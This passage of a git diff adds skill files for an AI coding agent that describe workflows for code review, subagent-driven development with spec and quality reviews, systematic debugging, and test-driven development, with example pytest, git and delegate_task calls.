+    - src/auth/login.py (added login endpoint)
+    - tests/test_auth.py (added 8 tests)
+
+    REVIEW CHECKLIST:
+    - [ ] Correctness: Does it do what it should?
+    - [ ] Edge cases: Are they handled?
+    - [ ] Error handling: Is it adequate?
+    - [ ] Code quality: Clear names, good structure?
+    - [ ] Test coverage: Are tests meaningful?
+    - [ ] Security: Any vulnerabilities?
+    - [ ] Performance: Any obvious issues?
+
+    OUTPUT FORMAT:
+    - Summary: [brief assessment]
+    - Critical Issues: [must fix — blocks merge]
+    - Important Issues: [should fix before merge]
+    - Minor Issues: [nice to have]
+    - Strengths: [what was done well]
+    - Verdict: APPROVE / REQUEST_CHANGES
+    """,
+    toolsets=['file']
+)
+```
+
+### Step 4: Act on Feedback
+
+**Critical Issues (block merge):**
+- Security vulnerabilities
+- Broken functionality
+- Data loss risk
+- Test failures
+- **Action:** Fix immediately before proceeding
+
+**Important Issues (should fix):**
+- Missing edge case handling
+- Poor error messages
+- Unclear code
+- Missing tests
+- **Action:** Fix before merge if possible
+
+**Minor Issues (nice to have):**
+- Style preferences
+- Refactoring suggestions
+- Documentation improvements
+- **Action:** Note for later or quick fix
+
+**If reviewer is wrong:**
+- Push back with technical reasoning
+- Show code/tests that prove it works
+- Request clarification
+
+## Review Dimensions
+
+### Correctness
+- Does it implement the requirements?
+- Are there logic errors?
+- Do edge cases work?
+- Are there race conditions?
+
+### Code Quality
+- Is code readable?
+- Are names clear and descriptive?
+- Is it too complex? (Functions >20 lines = smell)
+- Is there duplication?
+
+### Testing
+- Are there meaningful tests?
+- Do they cover edge cases?
+- Do they test behavior, not implementation?
+- Do all tests pass?
+
+### Security
+- Any injection vulnerabilities?
+- Proper input validation?
+- Secrets handled correctly?
+- Access control in place?
+
+### Performance
+- Any N+1 queries?
+- Unnecessary computation in loops?
+- Memory leaks?
+- Missing caching opportunities?
+
+## Review Output Format
+
+Standard format for reviewer subagent output:
+
+```markdown
+## Review Summary
+
+**Assessment:** [Brief overall assessment]
+**Verdict:** APPROVE / REQUEST_CHANGES
+
+---
+
+## Critical Issues (Fix Required)
+
+1. **[Issue title]**
+   - Location: `file.py:45`
+   - Problem: [Description]
+   - Suggestion: [How to fix]
+
+## Important Issues (Should Fix)
+
+1. **[Issue title]**
+   - Location: `file.py:67`
+   - Problem: [Description]
+   - Suggestion: [How to fix]
+
+## Minor Issues (Optional)
+
+1. **[Issue title]**
+   - Suggestion: [Improvement idea]
+
+## Strengths
+
+- [What was done well]
+```
+
+## Integration with Other Skills
+
+### With subagent-driven-development
+
+Review after EACH task — this is the two-stage review:
+1. Spec compliance review (does it match the plan?)
+2. Code quality review (is it well-built?)
+3. Fix issues from either review
+4. Proceed to next task only when both approve
+
+### With test-driven-development
+
+Review verifies:
+- Tests were written first (RED-GREEN-REFACTOR followed?)
+- Tests are meaningful (not just asserting True)?
+- Edge cases covered?
+- All tests pass?
+
+### With writing-plans
+
+Review validates:
+- Implementation matches the plan?
+- All tasks completed?
+- Quality standards met?
+
+## Red Flags
+
+**Never:**
+- Skip review because "it's simple"
+- Ignore Critical issues
+- Proceed with unfixed Important issues
+- Argue with valid technical feedback without evidence
+
+## Quality Gates
+
+**Must pass before merge:**
+- [ ] No critical issues
+- [ ] All tests pass
+- [ ] Review verdict: APPROVE
+- [ ] Requirements met
+
+**Should pass before merge:**
+- [ ] No important issues
+- [ ] Documentation updated
+- [ ] Performance acceptable
+
+## Remember
+
+```
+Review early
+Review often
+Be specific
+Fix critical issues first
+Quality over speed
+```
+
+**A good review catches what you missed.**
--- a/skills/software-development/subagent-driven-development/SKILL.md
+++ b/skills/software-development/subagent-driven-development/SKILL.md
@@ -0,0 +1,342 @@
+---
+name: subagent-driven-development
+description: Use when executing implementation plans with independent tasks. Dispatches fresh delegate_task per task with two-stage review (spec compliance then code quality).
+version: 1.1.0
+author: Hermes Agent (adapted from obra/superpowers)
+license: MIT
+metadata:
+  hermes:
+    tags: [delegation, subagent, implementation, workflow, parallel]
+    related_skills: [writing-plans, requesting-code-review, test-driven-development]
+---
+
+# Subagent-Driven Development
+
+## Overview
+
+Execute implementation plans by dispatching fresh subagents per task with systematic two-stage review.
+
+**Core principle:** Fresh subagent per task + two-stage review (spec then quality) = high quality, fast iteration.
+
+## When to Use
+
+Use this skill when:
+- You have an implementation plan (from writing-plans skill or user requirements)
+- Tasks are mostly independent
+- Quality and spec compliance are important
+- You want automated review between tasks
+
+**vs. manual execution:**
+- Fresh context per task (no confusion from accumulated state)
+- Automated review process catches issues early
+- Consistent quality checks across all tasks
+- Subagents can ask questions before starting work
+
+## The Process
+
+### 1. Read and Parse Plan
+
+Read the plan file. Extract ALL tasks with their full text and context upfront. Create a todo list:
+
+```python
+# Read the plan
+read_file("docs/plans/feature-plan.md")
+
+# Create todo list with all tasks
+todo([
+    {"id": "task-1", "content": "Create User model with email field", "status": "pending"},
+    {"id": "task-2", "content": "Add password hashing utility", "status": "pending"},
+    {"id": "task-3", "content": "Create login endpoint", "status": "pending"},
+])
+```
+
+**Key:** Read the plan ONCE. Extract everything. Don't make subagents read the plan file — provide the full task text directly in context.
+
+### 2. Per-Task Workflow
+
+For EACH task in the plan:
+
+#### Step 1: Dispatch Implementer Subagent
+
+Use `delegate_task` with complete context:
+
+```python
+delegate_task(
+    goal="Implement Task 1: Create User model with email and password_hash fields",
+    context="""
+    TASK FROM PLAN:
+    - Create: src/models/user.py
+    - Add User class with email (str) and password_hash (str) fields
+    - Use bcrypt for password hashing
+    - Include __repr__ for debugging
+
+    FOLLOW TDD:
+    1. Write failing test in tests/models/test_user.py
+    2. Run: pytest tests/models/test_user.py -v (verify FAIL)
+    3. Write minimal implementation
+    4. Run: pytest tests/models/test_user.py -v (verify PASS)
+    5. Run: pytest tests/ -q (verify no regressions)
+    6. Commit: git add -A && git commit -m "feat: add User model with password hashing"
+
+    PROJECT CONTEXT:
+    - Python 3.11, Flask app in src/app.py
+    - Existing models in src/models/
+    - Tests use pytest, run from project root
+    - bcrypt already in requirements.txt
+    """,
+    toolsets=['terminal', 'file']
+)
+```
+
+#### Step 2: Dispatch Spec Compliance Reviewer
+
+After the implementer completes, verify against the original spec:
+
+```python
+delegate_task(
+    goal="Review if implementation matches the spec from the plan",
+    context="""
+    ORIGINAL TASK SPEC:
+    - Create src/models/user.py with User class
+    - Fields: email (str), password_hash (str)
+    - Use bcrypt for password hashing
+    - Include __repr__
+
+    CHECK:
+    - [ ] All requirements from spec implemented?
+    - [ ] File paths match spec?
+    - [ ] Function signatures match spec?
+    - [ ] Behavior matches expected?
+    - [ ] Nothing extra added (no scope creep)?
+
+    OUTPUT: PASS or list of specific spec gaps to fix.
+    """,
+    toolsets=['file']
+)
+```
+
+**If spec issues found:** Fix gaps, then re-run spec review. Continue only when spec-compliant.
+
+#### Step 3: Dispatch Code Quality Reviewer
+
+After spec compliance passes:
+
+```python
+delegate_task(
+    goal="Review code quality for Task 1 implementation",
+    context="""
+    FILES TO REVIEW:
+    - src/models/user.py
+    - tests/models/test_user.py
+
+    CHECK:
+    - [ ] Follows project conventions and style?
+    - [ ] Proper error handling?
+    - [ ] Clear variable/function names?
+    - [ ] Adequate test coverage?
+    - [ ] No obvious bugs or missed edge cases?
+    - [ ] No security issues?
+
+    OUTPUT FORMAT:
+    - Critical Issues: [must fix before proceeding]
+    - Important Issues: [should fix]
+    - Minor Issues: [optional]
+    - Verdict: APPROVED or REQUEST_CHANGES
+    """,
+    toolsets=['file']
+)
+```
+
+**If quality issues found:** Fix issues, re-review. Continue only when approved.
+
+#### Step 4: Mark Complete
+
+```python
+todo([{"id": "task-1", "content": "Create User model with email field", "status": "completed"}], merge=True)
+```
+
+### 3. Final Review
+
+After ALL tasks are complete, dispatch a final integration reviewer:
+
+```python
+delegate_task(
+    goal="Review the entire implementation for consistency and integration issues",
+    context="""
+    All tasks from the plan are complete. Review the full implementation:
+    - Do all components work together?
+    - Any inconsistencies between tasks?
+    - All tests passing?
+    - Ready for merge?
+    """,
+    toolsets=['terminal', 'file']
+)
+```
+
+### 4. Verify and Commit
+
+```bash
+# Run full test suite
+pytest tests/ -q
+
+# Review all changes
+git diff --stat
+
+# Final commit if needed
+git add -A && git commit -m "feat: complete [feature name] implementation"
+```
+
+## Task Granularity
+
+**Each task = 2-5 minutes of focused work.**
+
+**Too big:**
+- "Implement user authentication system"
+
+**Right size:**
+- "Create User model with email and password fields"
+- "Add password hashing function"
+- "Create login endpoint"
+- "Add JWT token generation"
+- "Create registration endpoint"
+
+## Red Flags — Never Do These
+
+- Start implementation without a plan
+- Skip reviews (spec compliance OR code quality)
+- Proceed with unfixed critical/important issues
+- Dispatch multiple implementation subagents for tasks that touch the same files
+- Make subagent read the plan file (provide full text in context instead)
+- Skip scene-setting context (subagent needs to understand where the task fits)
+- Ignore subagent questions (answer before letting them proceed)
+- Accept "close enough" on spec compliance
+- Skip review loops (reviewer found issues → implementer fixes → review again)
+- Let implementer self-review replace actual review (both are needed)
+- **Start code quality review before spec compliance is PASS** (wrong order)
+- Move to next task while either review has open issues
+
+## Handling Issues
+
+### If Subagent Asks Questions
+
+- Answer clearly and completely
+- Provide additional context if needed
+- Don't rush them into implementation
+
+### If Reviewer Finds Issues
+
+- Implementer subagent (or a new one) fixes them
+- Reviewer reviews again
+- Repeat until approved
+- Don't skip the re-review
+
+### If Subagent Fails a Task
+
+- Dispatch a new fix subagent with specific instructions about what went wrong
+- Don't try to fix manually in the controller session (context pollution)
+
+## Efficiency Notes
+
+**Why fresh subagent per task:**
+- Prevents context pollution from accumulated state
+- Each subagent gets clean, focused context
+- No confusion from prior tasks' code or reasoning
+
+**Why two-stage review:**
+- Spec review catches under/over-building early
+- Quality review ensures the implementation is well-built
+- Catches issues before they compound across tasks
+
+**Cost trade-off:**
+- More subagent invocations (implementer + 2 reviewers per task)
+- But catches issues early (cheaper than debugging compounded problems later)
+
+## Integration with Other Skills
+
+### With writing-plans
+
+This skill EXECUTES plans created by the writing-plans skill:
+1. User requirements → writing-plans → implementation plan
+2. Implementation plan → subagent-driven-development → working code
+
+### With test-driven-development
+
+Implementer subagents should follow TDD:
+1. Write failing test first
+2. Implement minimal code
+3. Verify test passes
+4. Commit
+
+Include TDD instructions in every implementer context.
+
+### With requesting-code-review
+
+The two-stage review process IS the code review. For final integration review, use the requesting-code-review skill's review dimensions.
+
+### With systematic-debugging
+
+If a subagent encounters bugs during implementation:
+1. Follow systematic-debugging process
+2. Find root cause before fixing
+3. Write regression test
+4. Resume implementation
+
+## Example Workflow
+
+```
+[Read plan: docs/plans/auth-feature.md]
+[Create todo list with 5 tasks]
+
+--- Task 1: Create User model ---
+[Dispatch implementer subagent]
+  Implementer: "Should email be unique?"
+  You: "Yes, email must be unique"
+  Implementer: Implemented, 3/3 tests passing, committed.
+
+[Dispatch spec reviewer]
+  Spec reviewer: ✅ PASS — all requirements met
+
+[Dispatch quality reviewer]
+  Quality reviewer: ✅ APPROVED — clean code, good tests
+
+[Mark Task 1 complete]
+
+--- Task 2: Password hashing ---
+[Dispatch implementer subagent]
+  Implementer: No questions, implemented, 5/5 tests passing.
+
+[Dispatch spec reviewer]
+  Spec reviewer: ❌ Missing: password strength validation (spec says "min 8 chars")
+
+[Implementer fixes]
+  Implementer: Added validation, 7/7 tests passing.
+
+[Dispatch spec reviewer again]
+  Spec reviewer: ✅ PASS
+
+[Dispatch quality reviewer]
+  Quality reviewer: Important: Magic number 8, extract to constant
+  Implementer: Extracted MIN_PASSWORD_LENGTH constant
+  Quality reviewer: ✅ APPROVED
+
+[Mark Task 2 complete]
+
+... (continue for all tasks)
+
+[After all tasks: dispatch final integration reviewer]
+[Run full test suite: all passing]
+[Done!]
+```
+
+## Remember
+
+```
+Fresh subagent per task
+Two-stage review every time
+Spec compliance FIRST
+Code quality SECOND
+Never skip reviews
+Catch issues early
+```
+
+**Quality is not an accident. It's the result of systematic process.**
--- a/skills/software-development/systematic-debugging/SKILL.md
+++ b/skills/software-development/systematic-debugging/SKILL.md
@@ -0,0 +1,366 @@
+---
+name: systematic-debugging
+description: Use when encountering any bug, test failure, or unexpected behavior. 4-phase root cause investigation — NO fixes without understanding the problem first.
+version: 1.1.0
+author: Hermes Agent (adapted from obra/superpowers)
+license: MIT
+metadata:
+  hermes:
+    tags: [debugging, troubleshooting, problem-solving, root-cause, investigation]
+    related_skills: [test-driven-development, writing-plans, subagent-driven-development]
+---
+
+# Systematic Debugging
+
+## Overview
+
+Random fixes waste time and create new bugs. Quick patches mask underlying issues.
+
+**Core principle:** ALWAYS find root cause before attempting fixes. Symptom fixes are failure.
+
+**Violating the letter of this process is violating the spirit of debugging.**
+
+## The Iron Law
+
+```
+NO FIXES WITHOUT ROOT CAUSE INVESTIGATION FIRST
+```
+
+If you haven't completed Phase 1, you cannot propose fixes.
+
+## When to Use
+
+Use for ANY technical issue:
+- Test failures
+- Bugs in production
+- Unexpected behavior
+- Performance problems
+- Build failures
+- Integration issues
+
+**Use this ESPECIALLY when:**
+- Under time pressure (emergencies make guessing tempting)
+- "Just one quick fix" seems obvious
+- You've already tried multiple fixes
+- Previous fix didn't work
+- You don't fully understand the issue
+
+**Don't skip when:**
+- Issue seems simple (simple bugs have root causes too)
+- You're in a hurry (rushing guarantees rework)
+- Someone wants it fixed NOW (systematic is faster than thrashing)
+
+## The Four Phases
+
+You MUST complete each phase before proceeding to the next.
+
+---
+
+## Phase 1: Root Cause Investigation
+
+**BEFORE attempting ANY fix:**
+
+### 1. Read Error Messages Carefully
+
+- Don't skip past errors or warnings
+- They often contain the exact solution
+- Read stack traces completely
+- Note line numbers, file paths, error codes
+
+**Action:** Use `read_file` on the relevant source files. Use `search_files` to find the error string in the codebase.
+
+### 2. Reproduce Consistently
+
+- Can you trigger it reliably?
+- What are the exact steps?
+- Does it happen every time?
+- If not reproducible → gather more data, don't guess
+
+**Action:** Use the `terminal` tool to run the failing test or trigger the bug:
+
+```bash
+# Run specific failing test
+pytest tests/test_module.py::test_name -v
+
+# Run with verbose output
+pytest tests/test_module.py -v --tb=long
+```
+
+### 3. Check Recent Changes
+
+- What changed that could cause this?
+- Git diff, recent commits
+- New dependencies, config changes
+
+**Action:**
+
+```bash
+# Recent commits
+git log --oneline -10
+
+# Uncommitted changes
+git diff
+
+# Changes in specific file
+git log -p --follow src/problematic_file.py | head -100
+```
+
+### 4. Gather Evidence in Multi-Component Systems
+
+**WHEN system has multiple components (API → service → database, CI → build → deploy):**
+
+**BEFORE proposing fixes, add diagnostic instrumentation:**
+
+For EACH component boundary:
+- Log what data enters the component
+- Log what data exits the component
+- Verify environment/config propagation
+- Check state at each layer
+
+Run once to gather evidence showing WHERE it breaks.
+THEN analyze evidence to identify the failing component.
+THEN investigate that specific component.
+
+### 5. Trace Data Flow
+
+**WHEN error is deep in the call stack:**
+
+- Where does the bad value originate?
+- What called this function with the bad value?
+- Keep tracing upstream until you find the source
+- Fix at the source, not at the symptom
+
+**Action:** Use `search_files` to trace references:
+
+```python
+# Find where the function is called
+search_files("function_name(", path="src/", file_glob="*.py")
+
+# Find where the variable is set
+search_files("variable_name\\s*=", path="src/", file_glob="*.py")
+```
+
+### Phase 1 Completion Checklist
+
+- [ ] Error messages fully read and understood
+- [ ] Issue reproduced consistently
+- [ ] Recent changes identified and reviewed
+- [ ] Evidence gathered (logs, state, data flow)
+- [ ] Problem isolated to specific component/code
+- [ ] Root cause hypothesis formed
+
+**STOP:** Do not proceed to Phase 2 until you understand WHY it's happening.
+
+---
+
+## Phase 2: Pattern Analysis
+
+**Find the pattern before fixing:**
+
+### 1. Find Working Examples
+
+- Locate similar working code in the same codebase
+- What works that's similar to what's broken?
+
+**Action:** Use `search_files` to find comparable patterns:
+
+```python
+search_files("similar_pattern", path="src/", file_glob="*.py")
+```
+
+### 2. Compare Against References
+
+- If implementing a pattern, read the reference implementation COMPLETELY
+- Don't skim — read every line
+- Understand the pattern fully before applying
+
+### 3. Identify Differences
+
+- What's different between working and broken?
+- List every difference, however small
+- Don't assume "that can't matter"
+
+### 4. Understand Dependencies
+
+- What other components does this need?
+- What settings, config, environment?
+- What assumptions does it make?
+
+---
+
+## Phase 3: Hypothesis and Testing
+
+**Scientific method:**
+
+### 1. Form a Single Hypothesis
+
+- State clearly: "I think X is the root cause because Y"
+- Write it down
+- Be specific, not vague
+
+### 2. Test Minimally
+
+- Make the SMALLEST possible change to test the hypothesis
+- One variable at a time
+- Don't fix multiple things at once
+
+### 3. Verify Before Continuing
+
+- Did it work? → Phase 4
+- Didn't work? → Form NEW hypothesis
+- DON'T add more fixes on top
+
+### 4. When You Don't Know
+
+- Say "I don't understand X"
+- Don't pretend to know
+- Ask the user for help
+- Research more
+
+---
+
+## Phase 4: Implementation
+
+**Fix the root cause, not the symptom:**
+
+### 1. Create Failing Test Case
+
+- Simplest possible reproduction
+- Automated test if possible
+- MUST have before fixing
+- Use the `test-driven-development` skill
+
+### 2. Implement Single Fix
+
+- Address the root cause identified
+- ONE change at a time
+- No "while I'm here" improvements
+- No bundled refactoring
+
+### 3. Verify Fix
+
+```bash
+# Run the specific regression test
+pytest tests/test_module.py::test_regression -v
+
+# Run full suite — no regressions
+pytest tests/ -q
+```
+
+### 4. If Fix Doesn't Work — The Rule of Three
+
+- **STOP.**
+- Count: How many fixes have you tried?
+- If < 3: Return to Phase 1, re-analyze with new information
+- **If ≥ 3: STOP and question the architecture (step 5 below)**
+- DON'T attempt Fix #4 without architectural discussion
+
+### 5. If 3+ Fixes Failed: Question Architecture
+
+**Pattern indicating an architectural problem:**
+- Each fix reveals new shared state/coupling in a different place
+- Fixes require "massive refactoring" to implement
+- Each fix creates new symptoms elsewhere
+
+**STOP and question fundamentals:**
+- Is this pattern fundamentally sound?
+- Are we "sticking with it through sheer inertia"?
+- Should we refactor the architecture vs. continue fixing symptoms?
+
+**Discuss with the user before attempting more fixes.**
+
+This is NOT a failed hypothesis — this is a wrong architecture.
+
+---
+
+## Red Flags — STOP and Follow Process
+
+If you catch yourself thinking:
+- "Quick fix for now, investigate later"
+- "Just try changing X and see if it works"
+- "Add multiple changes, run tests"
+- "Skip the test, I'll manually verify"
+- "It's probably X, let me fix that"
+- "I don't fully understand but this might work"
+- "Pattern says X but I'll adapt it differently"
+- "Here are the main problems: [lists fixes without investigation]"
+- Proposing solutions before tracing data flow
+- **"One more fix attempt" (when already tried 2+)**
+- **Each fix reveals a new problem in a different place**
+
+**ALL of these mean: STOP. Return to Phase 1.**
+
+**If 3+ fixes failed:** Question the architecture (Phase 4 step 5).
+
+## Common Rationalizations
+
+| Excuse | Reality |
+|--------|---------|
+| "Issue is simple, don't need process" | Simple issues have root causes too. Process is fast for simple bugs. |
+| "Emergency, no time for process" | Systematic debugging is FASTER than guess-and-check thrashing. |
+| "Just try this first, then investigate" | First fix sets the pattern. Do it right from the start. |
+| "I'll write test after confirming fix works" | Untested fixes don't stick. Test first proves it. |
+| "Multiple fixes at once saves time" | Can't isolate what worked. Causes new bugs. |
+| "Reference too long, I'll adapt the pattern" | Partial understanding guarantees bugs. Read it completely. |
+| "I see the problem, let me fix it" | Seeing symptoms ≠ understanding root cause. |
+| "One more fix attempt" (after 2+ failures) | 3+ failures = architectural problem. Question the pattern, don't fix again. |
+
+## Quick Reference
+
+| Phase | Key Activities | Success Criteria |
+|-------|---------------|------------------|
+| **1. Root Cause** | Read errors, reproduce, check changes, gather evidence, trace data flow | Understand WHAT and WHY |
+| **2. Pattern** | Find working examples, compare, identify differences | Know what's different |
+| **3. Hypothesis** | Form theory, test minimally, one variable at a time | Confirmed or new hypothesis |
+| **4. Implementation** | Create regression test, fix root cause, verify | Bug resolved, all tests pass |
+
+## Hermes Agent Integration
+
+### Investigation Tools
+
+Use these Hermes tools during Phase 1:
+
+- **`search_files`** — Find error strings, trace function calls, locate patterns
+- **`read_file`** — Read source code with line numbers for precise analysis
+- **`terminal`** — Run tests, check git history, reproduce bugs
+- **`web_search`/`web_extract`** — Research error messages, library docs
+
+### With delegate_task
+
+For complex multi-component debugging, dispatch investigation subagents:
+
+```python
+delegate_task(
+    goal="Investigate why [specific test/behavior] fails",
+    context="""
+    Follow systematic-debugging skill:
+    1. Read the error message carefully
+    2. Reproduce the issue
+    3. Trace the data flow to find root cause
+    4. Report findings — do NOT fix yet
+
+    Error: [paste full error]
+    File: [path to failing code]
+    Test command: [exact command]
+    """,
+    toolsets=['terminal', 'file']
+)
+```
+
+### With test-driven-development
+
+When fixing bugs:
+1. Write a test that reproduces the bug (RED)
+2. Debug systematically to find root cause
+3. Fix the root cause (GREEN)
+4. The test proves the fix and prevents regression
+
+## Real-World Impact
+
+From debugging sessions:
+- Systematic approach: 15-30 minutes to fix
+- Random fixes approach: 2-3 hours of thrashing
+- First-time fix rate: 95% vs 40%
+- New bugs introduced: Near zero vs common
+
+**No shortcuts. No guessing. Systematic always wins.**
--- a/skills/software-development/test-driven-development/SKILL.md
+++ b/skills/software-development/test-driven-development/SKILL.md
@@ -0,0 +1,342 @@
+---
+name: test-driven-development
+description: Use when implementing any feature or bugfix, before writing implementation code. Enforces RED-GREEN-REFACTOR cycle with test-first approach.
+version: 1.1.0
+author: Hermes Agent (adapted from obra/superpowers)
+license: MIT
+metadata:
+  hermes:
+    tags: [testing, tdd, development, quality, red-green-refactor]
+    related_skills: [systematic-debugging, writing-plans, subagent-driven-development]
+---
+
+# Test-Driven Development (TDD)
+
+## Overview
+
+Write the test first. Watch it fail. Write minimal code to pass.
+
+**Core principle:** If you didn't watch the test fail, you don't know if it tests the right thing.
+
+**Violating the letter of the rules is violating the spirit of the rules.**
+
+## When to Use
+
+**Always:**
+- New features
+- Bug fixes
+- Refactoring
+- Behavior changes
+
+**Exceptions (ask the user first):**
+- Throwaway prototypes
+- Generated code
+- Configuration files
+
+Thinking "skip TDD just this once"? Stop. That's rationalization.
+
+## The Iron Law
+
+```
+NO PRODUCTION CODE WITHOUT A FAILING TEST FIRST
+```
+
+Write code before the test? Delete it. Start over.
+
+**No exceptions:**
+- Don't keep it as "reference"
+- Don't "adapt" it while writing tests
+- Don't look at it
+- Delete means delete
+
+Implement fresh from tests. Period.
+
+## Red-Green-Refactor Cycle
+
+### RED — Write Failing Test
+
+Write one minimal test showing what should happen.
+
+**Good test:**
+```python
+def test_retries_failed_operations_3_times():
+    attempts = 0
+    def operation():
+        nonlocal attempts
+        attempts += 1
+        if attempts < 3:
+            raise Exception('fail')
+        return 'success'
+
+    result = retry_operation(operation)
+
+    assert result == 'success'
+    assert attempts == 3
+```
+Clear name, tests real behavior, one thing.
+
+**Bad test:**
+```python
+def test_retry_works():
+    mock = MagicMock()
+    mock.side_effect = [Exception(), Exception(), 'success']
+    result = retry_operation(mock)
+    assert result == 'success'  # What about retry count? Timing?
+```
+Vague name, tests mock not real code.
+
+**Requirements:**
+- One behavior per test
+- Clear descriptive name ("and" in name? Split it)
+- Real code, not mocks (unless truly unavoidable)
+- Name describes behavior, not implementation
+
+### Verify RED — Watch It Fail
+
+**MANDATORY. Never skip.**
+
+```bash
+# Use terminal tool to run the specific test
+pytest tests/test_feature.py::test_specific_behavior -v
+```
+
+Confirm:
+- Test fails (not errors from typos)
+- Failure message is expected
+- Fails because the feature is missing
+
+**Test passes immediately?** You're testing existing behavior. Fix the test.
+
+**Test errors?** Fix the error, re-run until it fails correctly.
+
+### GREEN — Minimal Code
+
+Write the simplest code to pass the test. Nothing more.
+
+**Good:**
+```python
+def add(a, b):
+    return a + b  # Nothing extra
+```
+
+**Bad:**
+```python
+def add(a, b):
+    result = a + b
+    logging.info(f"Adding {a} + {b} = {result}")  # Extra!
+    return result
+```
+
+Don't add features, refactor other code, or "improve" beyond the test.
+
+**Cheating is OK in GREEN:**
+- Hardcode return values
+- Copy-paste
+- Duplicate code
+- Skip edge cases
+
+We'll fix it in REFACTOR.
+
+### Verify GREEN — Watch It Pass
+
+**MANDATORY.**
+
+```bash
+# Run the specific test
+pytest tests/test_feature.py::test_specific_behavior -v
+
+# Then run ALL tests to check for regressions
+pytest tests/ -q
+```
+
+Confirm:
+- Test passes
+- Other tests still pass
+- Output pristine (no errors, warnings)
+
+**Test fails?** Fix the code, not the test.
+
+**Other tests fail?** Fix regressions now.
+
+### REFACTOR — Clean Up
+
+After green only:
+- Remove duplication
+- Improve names
+- Extract helpers
+- Simplify expressions
+
+Keep tests green throughout. Don't add behavior.
+
+**If tests fail during refactor:** Undo immediately. Take smaller steps.
+
+### Repeat
+
+Next failing test for next behavior. One cycle at a time.
+
+## Why Order Matters
+
+**"I'll write tests after to verify it works"**
+
+Tests written after code pass immediately. Passing immediately proves nothing:
+- Might test the wrong thing
+- Might test implementation, not behavior
+- Might miss edge cases you forgot
+- You never saw it catch the bug
+
+Test-first forces you to see the test fail, proving it actually tests something.
+
+**"I already manually tested all the edge cases"**
+
+Manual testing is ad-hoc. You think you tested everything but:
+- No record of what you tested
+- Can't re-run when code changes
+- Easy to forget cases under pressure
+- "It worked when I tried it" ≠ comprehensive
+
+Automated tests are systematic. They run the same way every time.
+
+**"Deleting X hours of work is wasteful"**
+
+Sunk cost fallacy. The time is already gone. Your choice now:
+- Delete and rewrite with TDD (high confidence)
+- Keep it and add tests after (low confidence, likely bugs)
+
+The "waste" is keeping code you can't trust.
+
+**"TDD is dogmatic, being pragmatic means adapting"**
+
+TDD IS pragmatic:
+- Finds bugs before commit (faster than debugging after)
+- Prevents regressions (tests catch breaks immediately)
+- Documents behavior (tests show how to use code)
+- Enables refactoring (change freely, tests catch breaks)
+
+"Pragmatic" shortcuts = debugging in production = slower.
+
+**"Tests after achieve the same goals — it's spirit not ritual"**
+
+No. Tests-after answer "What does this do?" Tests-first answer "What should this do?"
+
+Tests-after are biased by your implementation. You test what you built, not what's required. Tests-first force edge case discovery before implementing.
+
+## Common Rationalizations
+
+| Excuse | Reality |
+|--------|---------|
+| "Too simple to test" | Simple code breaks. Test takes 30 seconds. |
+| "I'll test after" | Tests passing immediately prove nothing. |
+| "Tests after achieve same goals" | Tests-after = "what does this do?" Tests-first = "what should this do?" |
+| "Already manually tested" | Ad-hoc ≠ systematic. No record, can't re-run. |
+| "Deleting X hours is wasteful" | Sunk cost fallacy. Keeping unverified code is technical debt. |
+| "Keep as reference, write tests first" | You'll adapt it. That's testing after. Delete means delete. |
+| "Need to explore first" | Fine. Throw away exploration, start with TDD. |
+| "Test hard = design unclear" | Listen to the test. Hard to test = hard to use. |
+| "TDD will slow me down" | TDD faster than debugging. Pragmatic = test-first. |
+| "Manual test faster" | Manual doesn't prove edge cases. You'll re-test every change. |
+| "Existing code has no tests" | You're improving it. Add tests for the code you touch. |
+
+## Red Flags — STOP and Start Over
+
+If you catch yourself doing any of these, delete the code and restart with TDD:
+
+- Code before test
+- Test after implementation
+- Test passes immediately on first run
+- Can't explain why test failed
+- Tests added "later"
+- Rationalizing "just this once"
+- "I already manually tested it"
+- "Tests after achieve the same purpose"
+- "Keep as reference" or "adapt existing code"
+- "Already spent X hours, deleting is wasteful"
+- "TDD is dogmatic, I'm being pragmatic"
+- "This is different because..."
+
+**All of these mean: Delete code. Start over with TDD.**
+
+## Verification Checklist
+
+Before marking work complete:
+
+- [ ] Every new function/method has a test
+- [ ] Watched each test fail before implementing
+- [ ] Each test failed for expected reason (feature missing, not typo)
+- [ ] Wrote minimal code to pass each test
+- [ ] All tests pass
+- [ ] Output pristine (no errors, warnings)
+- [ ] Tests use real code (mocks only if unavoidable)
+- [ ] Edge cases and errors covered
+
+Can't check all boxes? You skipped TDD. Start over.
+
+## When Stuck
+
+| Problem | Solution |
+|---------|----------|
+| Don't know how to test | Write the wished-for API. Write the assertion first. Ask the user. |
+| Test too complicated | Design too complicated. Simplify the interface. |
+| Must mock everything | Code too coupled. Use dependency injection. |
+| Test setup huge | Extract helpers. Still complex? Simplify the design. |
+
+## Hermes Agent Integration
+
+### Running Tests
+
+Use the `terminal` tool to run tests at each step:
+
+```python
+# RED — verify failure
+terminal("pytest tests/test_feature.py::test_name -v")
+
+# GREEN — verify pass
+terminal("pytest tests/test_feature.py::test_name -v")
+
+# Full suite — verify no regressions
+terminal("pytest tests/ -q")
+```
+
+### With delegate_task
+
+When dispatching subagents for implementation, enforce TDD in the goal:
+
+```python
+delegate_task(
+    goal="Implement [feature] using strict TDD",
+    context="""
+    Follow test-driven-development skill:
+    1. Write failing test FIRST
+    2. Run test to verify it fails
+    3. Write minimal code to pass
+    4. Run test to verify it passes
+    5. Refactor if needed
+    6. Commit
+
+    Project test command: pytest tests/ -q
+    Project structure: [describe relevant files]
+    """,
+    toolsets=['terminal', 'file']
+)
+```
+
+### With systematic-debugging
+
+Bug found? Write failing test reproducing it. Follow TDD cycle. The test proves the fix and prevents regression.
+
+Never fix bugs without a test.
+
+## Testing Anti-Patterns
+
+- **Testing mock behavior instead of real behavior** — mocks should verify interactions, not replace the system under test
+- **Testing implementation details** — test behavior/results, not internal method calls
+- **Happy path only** — always test edge cases, errors, and boundaries
+- **Brittle tests** — tests should verify behavior, not structure; refactoring shouldn't break them
+
+## Final Rule
+
+```
+Production code → test exists and failed first
+Otherwise → not TDD
+```
+
+No exceptions without the user's explicit permission.
--- a/skills/software-development/writing-plans/SKILL.md
+++ b/skills/software-development/writing-plans/SKILL.md
@@ -0,0 +1,296 @@
+---
+name: writing-plans
+description: Use when you have a spec or requirements for a multi-step task. Creates comprehensive implementation plans with bite-sized tasks, exact file paths, and complete code examples.
+version: 1.1.0
+author: Hermes Agent (adapted from obra/superpowers)
+license: MIT
+metadata:
+  hermes:
+    tags: [planning, design, implementation, workflow, documentation]
+    related_skills: [subagent-driven-development, test-driven-development, requesting-code-review]
+---
+
+# Writing Implementation Plans
+
+## Overview
+
